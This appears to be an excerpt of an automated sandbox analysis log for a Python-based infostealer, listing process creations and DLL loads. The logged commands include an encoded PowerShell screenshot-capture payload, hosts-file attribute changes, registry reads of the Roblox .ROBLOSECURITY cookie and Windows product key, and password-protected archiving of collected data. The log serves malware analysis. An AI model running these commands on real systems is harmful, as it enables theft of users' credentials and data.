              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE0B.tmp" "c:\Users\user\AppData\Local\Temp\jnxiphgt\CSC11F91C33F0BB4EC3B771882E34D952E.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\phost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
